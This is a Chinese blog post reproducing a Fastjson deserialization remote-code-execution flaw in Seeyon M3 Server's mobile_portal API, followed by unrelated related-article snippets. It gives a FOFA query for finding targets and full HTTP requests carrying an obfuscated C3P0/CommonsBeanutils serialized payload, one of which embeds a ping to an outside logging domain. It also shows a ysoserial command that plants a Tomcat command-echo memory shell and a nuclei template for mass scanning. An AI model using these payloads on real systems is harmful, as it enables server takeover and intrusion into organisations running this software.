漏洞复现--致远 M3 反序列化 mobile_portal RCE

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

一:漏洞描述

M3server提供了多种功能模块,涵盖了办公自动化、项目管理、文档管理、流程管理、日程安排、知识管理等方面。该产品mobile_portal接口存在fastjson反序列化

二:漏洞影响版本

致远M3 server

三:网络空间测绘查询

fofa:
title="M3-Server"
image.png

四:漏洞复现

image.png
利用CB1链生成hex代码,替换POC中的HEX
image.png
POC:

POST /mobile_portal/api/pns/message/send/batch/6_1sp1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: application/json
Content-Length: 13458

[{"userMessageId":"{\"@\u0074\u0079\u0070\u0065\":\"\u0063\u006f\u006d\u002e\u006d\u0063\u0068\u0061\u006e\u0067\u0065\u002e\u0076\u0032\u002e\u0063\u0033\u0070\u0030\u002e\u0057\u0072\u0061\u0070\u0070\u0065\u0072\u0043\u006f\u006e\u006e\u0065\u0063\u0074\u0069\u006f\u006e\u0050\u006f\u006f\u006c\u0044\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\",\"\u0075\u0073\u0065\u0072\u004f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0073\u0041\u0073\u0053\u0074\u0072\u0069\u006e\u0067\":\"\u0048\u0065\u0078\u0041\u0073\u0063\u0069\u0069\u0053\u0065\u0072\u0069\u0061\u006c\u0069\u007a\u0065\u0064\u004d\u0061\u0070:aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870000000027372002b6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265616e436f6d70617261746f72e3a188ea7322a4480200024c000a636f6d70617261746f7271007e00014c000870726f70657274797400124c6a6176612f6c616e672f537472696e673b78707372003f6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e636f6d70617261746f72732e436f6d70617261626c65436f6d70617261746f72fbf49925b86eb13702000078707400106f757470757450726f706572746965737704000000037372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000002757200025b42acf317f8060854e00200007870000006f4cafebabe00000034005e09003300340800350a0004003607003708003808003909001b003a08001d08003b0a003c003d0a003c003e07003f0a000c00400a001c004109001b00420800430a001b004408004508001f09001b004608004709001b00480700490a001700410a0017004a0a0017004b07004c07004d010003636d640100124c6a6176612f6c616e672f537472696e673b0100086973537461746963010003796573010004666c61670100057374617274010003282956010004436f646501000f4c696e654e756d6265725461626c6501000d537461636b4d61705461626c6507004e07003f0100063c696e69743e07004c0100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b295601000a457863657074696f6e7307004f0100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100083c636c696e69743e01000a536f7572636546696c6501001052756e74696d65457865632e6a6176610700500c0051001e0100012f0c005200530100106a6176612f6c616e672f537472696e670100072f62696e2f73680100022d630c001d001e0100022f430700540c005500560c005700580100136a6176612f696f2f494f457863657074696f6e0c005900230c002900230c0021001e01000b69735374617469635965730c0022002301001870696e672077786e636876796b69612e64677268332e636e0c001f001e0100035965730c0020001e0100176a6176612f6c616e672f537472696e674275696c6465720c005a005b0c005c005d010008417953516c50466b010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c65740100135b4c6a6176612f6c616e672f537472696e673b010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e01000c6a6176612f696f2f46696c65010009736570617261746f72010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010028285b4c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b01000f7072696e74537461636b5472616365010006617070656e6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e674275696c6465723b010008746f537472696e6701001428294c6a6176612f6c616e672f537472696e673b0021001b001c00000004000a001d001e0000000a001f001e0000000a0020001e0000000a0021001e0000000500090022002300010024000000990004000200000049b200011202b6000399001b06bd0004590312055359041206535905b20007534ba7001806bd0004590312085359041209535905b20007534bb8000a2ab6000b57a700084c2bb6000db10001003800400043000c0002002500000022000800000016000b0017002300190038001d004000200043001e0044001f0048002100260000000e000423fc00140700274a07002804000100290023000100240000004900020001000000132ab7000eb2000f1210b600039a0006b80011b10000000200250000001200040000002700040028000f00290012002a00260000000c0001ff0012000107002a00000001002b002c00020024000000190000000300000001b10000000100250000000600010000002d002d000000040001002e0001002b002f00020024000000190000000400000001b100000001002500000006000100000030002d000000040001002e000800300023000100240000007000020000000000371212b300071213b300141215b30016bb001759b70018b20014b60019b20016b60019b6001ab3000fb2000f1210b60003990006b80011b10000000200250000001e00070000001000050011000a0012000f002300280024003300250036002600260000000300013600010031000000020032757200025b42acf317f8060854e00200007870000001d4cafebabe00000032001b0a0003001507001707001807001901001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c75650571e669ee3c6d47180100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010003466f6f01000c496e6e6572436c61737365730100254c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f3b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07001a01002379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f0100106a6176612f6c616e672f4f626a6563740100146a6176612f696f2f53657269616c697a61626c6501001f79736f73657269616c2f7061796c6f6164732f7574696c2f47616467657473002100020003000100040001001a000500060001000700000002000800010001000a000b0001000c0000002f00010001000000052ab70001b100000002000d0000000600010000003c000e0000000c000100000005000f001200000002001300000002001400110000000a00010002001600100009707400084551505a56504a42707701007871007e000d78;\"}|","channelId":"111","title":"111","content":"222","deviceType":"androidphone","serviceProvider":"baidu","deviceFirm":"other"}]

image.png
200成功
再请求/mobile_portal/api/systemLog/pns/loadLog/app.log接口

GET /mobile_portal/api/systemLog/pns/loadLog/app.log HTTP/1.1
Host: x.x.x.x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate

image.png
成功执行ping命令
image.png
使用ysoserial生成CB链TomcatCmdEcho回显内存马
https://github.com/Y4er/ysoserial
java -jar ysoserial-main-49888d3191-1.jar CommonsBeanutils192NOCC "CLASS:TomcatCmdEcho" | hex
image.png
替换HEX
image.png
执行命令,在请求内容加上cmd执行命令回显

GET /mobile_portal/api/systemLog/pns/loadLog/app.log HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
cmd: whoami

image.png

五:批量检测

id: seeyon-m3server-mobile_portal-rce
info:
  name: 致远M3server反序列化RCE漏洞
  author: fgz
  severity: critical
  description: '致远M3 server中 mobile_portal接口处发现了fastjson反序列化漏洞,漏洞是通过接口/mobile_portal/api/pns/message/send/batch/6_1sp1将恶意payload存入日志中,然后利用/mobile_portal/api/systemLog/pns/loadLog/app.log接口会将日志中的JSON数据进行反序列化的机制触发Fastjson漏洞,造成反序列化远程代码执行。'
  tags: 2023,seeyon,m3server,rce
  metadata:
    max-request: 3
    fofa-query: title="M3-Server"
    verified: true

http:
  - raw:
      - |
        POST /mobile_portal/api/pns/message/send/batch/6_1sp1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Upgrade-Insecure-Requests: 1
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: none
        Sec-Fetch-User: ?1
        Content-Type: application/json

        [{"userMessageId":"{\"@\u0074\u0079\u0070\u0065\":\"\u0063\u006f\u006d\u002e\u006d\u0063\u0068\u0061\u006e\u0067\u0065\u002e\u0076\u0032\u002e\u0063\u0033\u0070\u0030\u002e\u0057\u0072\u0061\u0070\u0070\u0065\u0072\u0043\u006f\u006e\u006e\u0065\u0063\u0074\u0069\u006f\u006e\u0050\u006f\u006f\u006c\u0044\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\",\"\u0075\u0073\u0065\u0072\u004f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0073\u0041\u0073\u0053\u0074\u0072\u0069\u006e\u0067\":\"\u0048\u0065\u0078\u0041\u0073\u0063\u0069\u0069\u0053\u0065\u0072\u0069\u0061\u006c\u0069\u007a\u0065\u0064\u004d\u0061\u0070:aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870000000027372002b6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265616e436f6d70617261746f72e3a188ea7322a4480200024c000a636f6d70617261746f7271007e00014c000870726f70657274797400124c6a6176612f6c616e672f537472696e673b78707372002a6a6176612e6c616e672e537472696e672443617365496e73656e736974697665436f6d70617261746f7277035c7d5c50e5ce02000078707400106f757470757450726f706572746965737704000000037372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000002757200025b42acf317f8060854e00200007870000014afcafebabe0000003301050a004500890a008a008b0a008a008c0a001d008d08007a0a001b008e0a008f00900a008f009107007b0a008a00920800930a002000940800950800960700970800980800580700990a001b009a08009b08007007009c0b0016009d0b0016009e08006708009f0700a00a001b00a10700a20a00a300a40800a50700a60800a70a002000a80800a909002500aa0700ab0a002500ac0800ad0a00ae00af0a002000b00800b10800b20800b30800b40800b50700b60700b70a003000b80a003000b90a00ba00bb0a002f00bc0800bd0a002f00be0a002f00bf0a002000c00800c10a001b00c20a001b00c30800c40700640a001b00c50800c60700c70800c80800c90700ca0701030700cc0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301002c4c79736f73657269616c2f7061796c6f6164732f74656d706c617465732f546f6d636174436d644563686f3b0100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074696f6e730700cd0100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b0100083c636c696e69743e010001650100204c6a6176612f6c616e672f4e6f537563684669656c64457863657074696f6e3b010003636c730100114c6a6176612f6c616e672f436c6173733b010004766172350100214c6a6176612f6c616e672f4e6f537563684d6574686f64457863657074696f6e3b010004636d64730100135b4c6a6176612f6c616e672f537472696e673b010006726573756c740100025b4201000970726f636573736f720100124c6a6176612f6c616e672f4f626a6563743b010003726571010004726573700100016a01000149010001740100124c6a6176612f6c616e672f5468726561643b0100037374720100124c6a6176612f6c616e672f537472696e673b0100036f626a01000a70726f636573736f72730100104c6a6176612f7574696c2f4c6973743b0100154c6a6176612f6c616e672f457863657074696f6e3b01000169010004666c61670100015a01000567726f75700100174c6a6176612f6c616e672f54687265616447726f75703b010001660100194c6a6176612f6c616e672f7265666c6563742f4669656c643b010007746872656164730100135b4c6a6176612f6c616e672f5468726561643b01000d537461636b4d61705461626c650700ce0700cf0700d00700a60700a207009907009c0700620700c70700ca01000a536f7572636546696c65010012546f6d636174436d644563686f2e6a6176610c004600470700d00c00d100d20c00d300d40c00d500d60c00d700d80700cf0c00d900da0c00db00dc0c00dd00de010004657865630c00df00e0010004687474700100067461726765740100126a6176612f6c616e672f52756e6e61626c6501000674686973243001001e6a6176612f6c616e672f4e6f537563684669656c64457863657074696f6e0c00e100d6010006676c6f62616c01000e6a6176612f7574696c2f4c6973740c00e200e30c00db00e401000b676574526573706f6e736501000f6a6176612f6c616e672f436c6173730c00e500e60100106a6176612f6c616e672f4f626a6563740700e70c00e800e90100096765744865616465720100106a6176612f6c616e672f537472696e67010003636d640c00ea00eb0100097365745374617475730c00ec005e0100116a6176612f6c616e672f496e74656765720c004600ed0100076f732e6e616d650700ee0c00ef00f00c00f100de01000377696e010007636d642e6578650100022f630100092f62696e2f626173680100022d630100116a6176612f7574696c2f5363616e6e65720100186a6176612f6c616e672f50726f636573734275696c6465720c004600f20c00f300f40700f50c00f600f70c004600f80100025c410c00f900fa0c00fb00de0c00fc00fd0100246f72672e6170616368652e746f6d6361742e7574696c2e6275662e427974654368756e6b0c00fe00ff0c0100010101000873657442797465730c010200e6010007646f577269746501001f6a6176612f6c616e672f4e6f537563684d6574686f64457863657074696f6e0100136a6176612e6e696f2e42797465427566666572010004777261700100136a6176612f6c616e672f457863657074696f6e01002a79736f73657269616c2f7061796c6f6164732f74656d706c617465732f546f6d636174436d644563686f010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c6574010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e0100156a6176612f6c616e672f54687265616447726f75700100176a6176612f6c616e672f7265666c6563742f4669656c640100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b01000e67657454687265616447726f757001001928294c6a6176612f6c616e672f54687265616447726f75703b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b01000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000d6765745375706572636c61737301000473697a650100032829490100152849294c6a6176612f6c616e672f4f626a6563743b0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100076973456d70747901000328295a01000454595045010004284929560100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f77657243617365010016285b4c6a6176612f6c616e672f537472696e673b2956010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b010018284c6a6176612f696f2f496e70757453747265616d3b295601000c75736544656c696d69746572010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f7574696c2f5363616e6e65723b0100046e657874010008676574427974657301000428295b42010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b01000b6e6577496e7374616e636501001428294c6a6176612f6c616e672f4f626a6563743b0100116765744465636c617265644d6574686f6401003979736f73657269616c2f7061796c6f6164732f74656d706c617465732f546f6d636174436d644563686f39383334393531333839303130323301003b4c79736f73657269616c2f7061796c6f6164732f74656d706c617465732f546f6d636174436d644563686f3938333439353133383930313032333b002100440045000000000004000100460047000100480000002f00010001000000052ab70001b100000002004900000006000100000009004a0000000c000100000005004b010400000001004d004e000200480000003f0000000300000001b100000002004900000006000100000057004a00000020000300000001004b0104000000000001004f0050000100000001005100520002005300000004000100540001004d005500020048000000490000000400000001b10000000200490000000600010000005c004a0000002a000400000001004b0104000000000001004f005000010000000100560057000200000001005800590003005300000004000100540008005a004700010048000005d500080011000002fd033bb80002b600034c2bb600041205b600064d2c04b600072c2bb60008c00009c000094e03360415042dbea202cd2d1504323a051905c70006a702b91905b6000a3a061906120bb6000c9a000d1906120db6000c9a0006a7029b1905b60004120eb600064d2c04b600072c1905b600083a071907c1000f9a0006a702781907b600041210b600064d2c04b600072c1907b600083a071907b600041211b600064da700163a081907b60004b60013b600131211b600064d2c04b600072c1907b600083a071907b60004b600131214b600064da700103a081907b600041214b600064d2c04b600072c1907b600083a071907b600041215b600064d2c04b600072c1907b60008c00016c000163a0803360915091908b900170100a201cb19081509b9001802003a0a190ab600041219b600064d2c04b600072c190ab600083a0b190bb60004121a03bd001bb6001c190b03bd001db6001e3a0c190bb60004121f04bd001b5903122053b6001c190b04bd001d5903122153b6001ec000203a061906c601571906b600229a014f190cb60004122304bd001b5903b2002453b6001c190c04bd001d5903bb0025591100c8b7002653b6001e571227b80028b60029122ab6000c99001906bd00205903122b535904122c535905190653a7001606bd00205903122d535904122e5359051906533a0dbb002f59bb003059190db70031b60032b60033b700341235b60036b60037b600383a0e1239b8003a3a0f190fb6003b3a07190f123c06bd001b5903123d535904b20024535905b2002453b6003e190706bd001d5903190e535904bb00255903b70026535905bb002559190ebeb7002653b6001e57190cb60004123f04bd001b5903190f53b6001c190c04bd001d5903190753b6001e57a7004e3a0f1241b8003a3a101910124204bd001b5903123d53b6003e191004bd001d5903190e53b6001e3a07190cb60004123f04bd001b5903191053b6001c190c04bd001d5903190753b6001e57043b1a990006a70009840901a7fe2f1a990006a70011a700083a05a70003840401a7fd32a700044bb10008009500a000a3001200c300d100d400120213028602890040002e003902ed0043003c005702ed0043005a007a02ed0043007d02e702ed0043000002f802fb004300030049000000fe003f0000000d0002000e0009000f001300100018001100240012002e001400340015003c001600430017005a001800650019006a001a0072001b007d001c0088001d008d001e0095002000a0002300a3002100a5002200b6002400bb002500c3002700d1002a00d4002800d6002900e1002b00e6002c00ee002d00f9002e00fe002f010c0030011b0031012600320131003301360034013e003501570036017d0037018a003801b5003901f0003a0213003c021a003d0221003e0264003f0286004402890040028b00410292004202b2004302d4004502d6004702dd003002e3004902ea004c02ed004a02ef004b02f2001202f8005002fb004f02fc0051004a000000d4001500a50011005b005c000800d6000b005b005c0008021a006c005d005e000f02920042005d005e0010028b0049005f0060000f01f000e600610062000d021300c300630064000e012601b700650066000a013e019f00670066000b0157018600680066000c010f01d40069006a0009003402b6006b006c0005004302a7006d006e000600720278006f00660007010c01de00700071000802ef0003005b00720005002702d10073006a0004000202f6007400750000000902ef007600770001001302e5007800790002002402d4007a007b0003007c000000a80017ff002700050107007d07007e070009010000fc001407007ffc001a07008002fc002207008165070082125d0700820cfd002d07008301fe00cb07008107008107008152070084ff009a000f0107007d07007e0700090107007f0700800700810700830107008107008107008107008407003d0001070085fb004af90001f80006fa0005ff000600050107007d07007e0700090100004207008604ff0005000000004207008600000100870000000200887571007e0010000001d4cafebabe00000033001b0a0003001507001707001807001901001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c75650571e669ee3c6d47180100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010003466f6f01000c496e6e6572436c61737365730100254c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f3b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07001a01002379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f0100106a6176612f6c616e672f4f626a6563740100146a6176612f696f2f53657269616c697a61626c6501001f79736f73657269616c2f7061796c6f6164732f7574696c2f47616467657473002100020003000100040001001a000500060001000700000002000800010001000a000b0001000c0000002f00010001000000052ab70001b100000002000d000000060001000000c7000e0000000c000100000005000f001200000002001300000002001400110000000a00010002001600100009707400084448434e57504c53707701007871007e000d78;\"}|","channelId":"111","title":"111","content":"222","deviceType":"androidphone","serviceProvider":"baidu","deviceFirm":"other"}]

      - |
        GET /mobile_portal/api/systemLog/pns/loadLog/app.log HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        cmd: whoami
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200 && contains((body_1), 'Success') && status_code_2 == 200 && contains((body_1), '\')"

image.png
image.png
六:修复建议
严格限制/mobile_portal/接口的访问权限,关注厂家官网获取修复补丁。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/204968.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

应用程序APP制作用Vue3CreateApp打包有什么优势?有哪些好处?

在当代的前端开发领域,Vue.js作为一个领先的JavaScript框架,一直处于技术革新和发展的前沿。Vue3作为该框架的最新版本,带来了更多的新特性和优化。在这些新特性中,createApp方法是一个非常值得关注的变化。对于开发者而言&#x…

redis相关题

1 什么是Redis Redis(Remote Dictionary Server) 是⼀个使⽤ C 语⾔编写的,开源的(BSD许可)⾼性能⾮关系型(NoSQL)的键值对数据库。Redis 可以存储键和五种不同类型的值之间的映射。键的类型只能为字符串,…

石油化工隐蔽设备AR可视化检修协助系统让新手也能轻松上岗

随着城市基础设施建设的不断推进,地下管线巡检工作的重要性日益凸显。传统的巡检方法已无法满足现代都市的高效运营需求。此时,地下管线AR智慧巡检远程协助系统应运而生,凭借其独特的特点与优势,为城市地下管线巡检带来了革命性的…

vue中的插槽用法(动态插槽)

vue中提供了一种通讯方式叫插槽>分为:默认插槽、具名插槽(作用域插槽) 1. 当一个组件有不确定的结构时, 就需要使用slot技术了 2. 注意: 插槽内容是在父组件中编译后, 再传递给子组件 3. 如果决定结构的数据在父组件, 那用默认slot或具名slot (1) 当只有一个不…

易石无代码开发:电商平台连接CRM与客服系统,实现营销自动化

易石无代码开发的优势 易石软件以其强大的无代码开发平台,为电商企业提供了一种全新的业务集成手段。在激烈的市场竞争中,电商平台必须不断优化其运营效率和客户服务质量。易石无需复杂的API开发,通过简单的配置就能实现电商平台与CRM、客服…

openGauss学习笔记-135 openGauss 数据库运维-例行维护-检查openGauss健康状态

文章目录 openGauss学习笔记-135 openGauss 数据库运维-例行维护-检查openGauss健康状态135.1 检查办法135.2 操作步骤135.3 异常处理 openGauss学习笔记-135 openGauss 数据库运维-例行维护-检查openGauss健康状态 135.1 检查办法 通过openGauss提供的gs_check工具可以开展o…

Python自动化测试——元素定位

1.selenium简介 Selenium是一个用于Web应用程序测试的工具。Selenium是直接运行在浏览器中,模拟用户操作web界面。支持多平台:windows、linux、MAC ,支持多浏览器:ie、firefox、chrome等浏览器。 2. 启动浏览器 # 导入webdrive…

狗都会配的SNAT和DNAT配置

1 SNAT 1.1 SNAT SNAT原理与应用:. SNAT 应用环境:局域网主机共享单个公网IP地址接入Internet (私有IP不能在Internet中正常路由) SNAT原理:源地址转换,根据指定条件修改数据包的源IP地址,通常被叫做源映谢 SNAT转换前提条件: 1.局域网各主机已正确设…

计算机毕业设计|基于SpringBoot+MyBatis框架的电脑商城的设计与实现(系统概述与环境搭建)

计算机毕业设计|基于SpringBoot+MyBatis框架的电脑商城的设计与实现(系统概述与环境搭建) 该项目分析着重于设计和实现基于SpringBoot+MyBatis框架的电脑商城。首先,通过深入分析项目所需数据,包括用户、商品、商品类别、收藏、订单、购物车、收货地址,建立了数据模型。在…

美团三季报“外强中干”,二级市场叫好不叫座

11月28日,美团(HK:03690)发布截至2023年9月30日的业绩公告。财报显示,美团2023年第三季度的收入为764.67亿元,较2022年同期的626.19亿元增长22.1%;净利润为35.93亿元,同比增长195.3%。 在非国际…

ArcGIS制作广场游客聚集状态及密度图

文章目录 一、加载实验数据二、平均最近邻法介绍1. 平均最近邻工具2. 广场游客聚集状态3. 结果分析三、游客密度制图一、加载实验数据 二、平均最近邻法介绍 1. 平均最近邻工具 “平均最近邻”工具将返回五个值:“平均观测距离”、“预期平均距离”、“最近邻指数”、z 得分和…

【JMeter】菜单栏介绍

【菜单栏】 1. Tools 导入curl接口信息 作用&#xff1a;快速导入接口信息&#xff0c;响应头和缓存信息等 Log level临时修改日志等级 作用&#xff1a; 从勾选的level开始往更高等级level抓取log日志等级优先级&#xff1a; ALL < TRACE < DEBUG <INFO<WA…

内模原理与控制

基于模型的控制方法&#xff1a; 把外部作用信号的动力学模型植入控制器来构成高精度反馈控制系统的设计原理。 内模原理&#xff08;IMP&#xff09;指的是&#xff0c;想要实现对R(s)的无差跟踪&#xff0c;系统的反馈回路中需要包含一个与外部输入R(s)相同的动力学模型。通…

【设计模式】03:单例模式

单例模式 OVERVIOW 单例模式1.单例模式实现2.饿汉与懒汉&#xff08;1&#xff09;饿汉模式&#xff08;2&#xff09;懒汉模式 3.懒汉线程安全1&#xff08;1&#xff09;引入互斥锁&#xff08;2&#xff09;引入双重检查锁定&#xff08;3&#xff09;引入原子变量 4.懒汉线…

[Android]AlertDialog对话框

1.介绍AlertDialog AlertDialog是Android中常用的对话框组件之一&#xff0c;用于在应用程序中显示一些提示信息、警告、确认信息或者提供用户进行选择的界面。AlertDialog通常用于与用户进行交互&#xff0c;例如要求用户确认某个操作、输入一些信息或者从一组选项中选择一个。…

【Linux】Linux下的代码调试器 ---gdb

&#x1f466;个人主页&#xff1a;Weraphael ✍&#x1f3fb;作者简介&#xff1a;目前正在学习c和Linux还有算法 ✈️专栏&#xff1a;Linux &#x1f40b; 希望大家多多支持&#xff0c;咱一起进步&#xff01;&#x1f601; 如果文章有啥瑕疵&#xff0c;希望大佬指点一二 …

高等数学上岸宝典笔记

